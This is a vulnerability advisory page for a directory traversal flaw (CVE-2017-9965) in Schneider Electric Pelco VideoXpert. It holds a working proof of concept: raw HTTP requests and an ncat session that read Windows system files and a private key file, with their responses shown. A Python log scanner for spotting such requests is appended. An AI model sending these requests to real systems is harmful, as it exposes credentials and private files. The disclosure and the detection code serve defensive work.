
Schneider Electric Pelco VideoXpert Core Admin Portal Directory Traversal

Published: 10 Jul 2017 00:00:00 | Reported by: Gjoko Krstic | Type: zeroscience | Source: www.zeroscience.mk

Schneider Electric Pelco VideoXpert Core Admin Portal Directory Traversal. A directory traversal vulnerability in Pelco VideoXpert allows an unauthenticated attacker to view arbitrary files within the context of the web server. Impact includes exposure of system information and sensitive information.

Related

Reporter | Title | Published
Circl | CVE-2017-9965 | 5 Oct 2025 10:02
CNVD | Schneider Electric Pelco VideoXpert Enterprise Directory Traversal Vulnerability (CNVD-2017-38304) | 28 Dec 2017 00:00
CVE | CVE-2017-9965 | 2 Jan 2018 03:00
Cvelist | CVE-2017-9965 | 2 Jan 2018 03:00
EUVD | EUVD-2017-18874 | 7 Oct 2025 00:30
ICS | Schneider Electric Pelco VideoXpert Enterprise | 21 Dec 2017 00:00
Nuclei | Schneider Electric Pelco VideoXpert Enterprise 2.0 - Path Traversal | 4 Jun 2026 03:48
NVD | CVE-2017-9965 | 2 Jan 2018 03:29
OpenVAS | Pelco VideoXpert Multiple Vulnerabilities | 11 Jul 2017 00:00
Prion | Directory traversal | 2 Jan 2018 03:29

<html><body><p>Schneider Electric Pelco VideoXpert Core Admin Portal Directory Traversal


Vendor: Schneider Electric SE
Product web page: https://www.pelco.com
Affected version: 2.0.41
                  1.14.7
                  1.12.105

Summary: VideoXpert is a video management solution designed for
scalability, fitting the needs of surveillance operations of any size.
VideoXpert Ultimate can also aggregate other VideoXpert systems,
tying multiple video management systems into a single interface.

Desc: Pelco VideoXpert suffers from a directory traversal vulnerability.
Exploiting this issue will allow an unauthenticated attacker to
view arbitrary files within the context of the web server.


Tested on: Microsoft Windows 7 Professional SP1 (EN)
           Jetty(9.2.6.v20141205)
           MongoDB/3.2.10


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2017-5419
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5419.php


05.04.2017

--


PoC:
----

GET /portal//..\\\..\\\..\\\..\\\windows\win.ini HTTP/1.1
Host: 172.19.0.198
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close


HTTP/1.1 200 OK
Date: Wed, 05 Apr 2017 13:27:39 GMT
Last-Modified: Tue, 14 Jul 2009 05:09:22 GMT
Cache-Control: public, max-age=86400
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
ETag: 1247548162000
Content-Length: 403
Connection: close

; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
[MCI Extensions.BAK]
3g2=MPEGVideo
3gp=MPEGVideo
3gp2=MPEGVideo
3gpp=MPEGVideo
aac=MPEGVideo
adt=MPEGVideo
adts=MPEGVideo
m2t=MPEGVideo
m2ts=MPEGVideo
m2v=MPEGVideo
m4a=MPEGVideo
m4v=MPEGVideo
mod=MPEGVideo
mov=MPEGVideo
mp4=MPEGVideo
mp4v=MPEGVideo
mts=MPEGVideo
ts=MPEGVideo
tts=MPEGVideo


------


GET /portal//..\\\..\\\..\\\..\\\ProgramData\Pelco\Core\db\security\key.pem HTTP/1.1
Host: 172.19.0.198
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close


HTTP/1.1 200 OK
Date: Thu, 06 Apr 2017 11:59:07 GMT
Last-Modified: Wed, 05 Apr 2017 12:58:36 GMT
Cache-Control: public, max-age=86400
Content-Type: text/html; charset=UTF-8
ETag: 1491397116000
Content-Length: 9
Connection: close

T0ps3cret


------


bash-4.4$ cat pelco_system_ini.txt
GET /portal//..\\\..\\\..\\\..\\\windows\system.ini HTTP/1.1
Host: 172.19.0.198
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close

bash-4.4$ ncat -v -n 172.19.0.198 80 < pelco_system_ini.txt
Ncat: Version 7.40 ( https://nmap.org/ncat )
Ncat: Connected to 172.19.0.198:80.
HTTP/1.1 200 OK
Date: Thu, 06 Apr 2017 12:30:01 GMT
Last-Modified: Wed, 10 Jun 2009 21:08:04 GMT
Cache-Control: public, max-age=86400
Content-Type: text/html; charset=UTF-8
ETag: 1244668084000
Content-Length: 219
Connection: close

; for 16-bit app support
[386Enh]
woafont=dosapp.fon
EGA80WOA.FON=EGA80WOA.FON
EGA40WOA.FON=EGA40WOA.FON
CGA80WOA.FON=CGA80WOA.FON
CGA40WOA.FON=CGA40WOA.FON

[drivers]
wave=mmdrv.dll
timer=timer.drv

[mci]
Ncat: 220 bytes sent, 460 bytes received in 0.03 seconds.
bash-4.4$ 

</p></body></html>
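A defender-side check for the request shape shown in the PoC, added here as an example and not part of the original advisory: it flags access-log entries whose path contains a `..` segment once percent-encoding is removed and `\` is treated as a path separator, which also covers encoded variants the advisory does not show. The combined log format, the function names and the sample entries are assumptions.

```python
import re
from urllib.parse import unquote

# Request line inside a combined-format access log entry: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?:GET|HEAD|POST|PUT|DELETE|OPTIONS) (\S+) HTTP/[\d.]+"')


def has_dot_dot_segment(target: str, max_decode_rounds: int = 3) -> bool:
    """True if the path part of a request target contains a '..' segment
    after percent-decoding, with both '/' and '\\' treated as separators."""
    path = target.split("?", 1)[0]
    for _ in range(max_decode_rounds):  # bounded loop to unwrap double encoding
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    # Windows file APIs accept both separators, so split on either one.
    segments = re.split(r"[/\\]+", path)
    return ".." in segments


def scan(lines):
    """Return (source_ip, request_target) for each entry with a '..' segment."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if match and has_dot_dot_segment(match.group(1)):
            hits.append((line.split(" ", 1)[0], match.group(1)))
    return hits


# Constructed sample entries (not from a real system). The first uses the
# request path from the advisory's PoC; the second is a percent-encoded form.
SAMPLE_LOG = [
    r'198.51.100.7 - - [05/Apr/2017:13:27:39 +0000] "GET /portal//..\\\..\\\..\\\..\\\windows\win.ini HTTP/1.1" 200 403',
    r'198.51.100.7 - - [05/Apr/2017:13:28:02 +0000] "GET /portal/%2e%2e%5c%2e%2e%5cwindows%5cwin.ini HTTP/1.1" 404 0',
    r'203.0.113.20 - - [05/Apr/2017:13:29:10 +0000] "GET /portal/index.html HTTP/1.1" 200 5120',
    r'203.0.113.20 - - [05/Apr/2017:13:29:11 +0000] "GET /portal/js/app..min.js HTTP/1.1" 200 880',
]

if __name__ == "__main__":
    for ip, target in scan(SAMPLE_LOG):
        print(f"traversal attempt from {ip}: {target}")
```

A 200 status on a flagged entry, as in the first sample line, indicates the file was served and should be triaged ahead of entries that returned an error.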
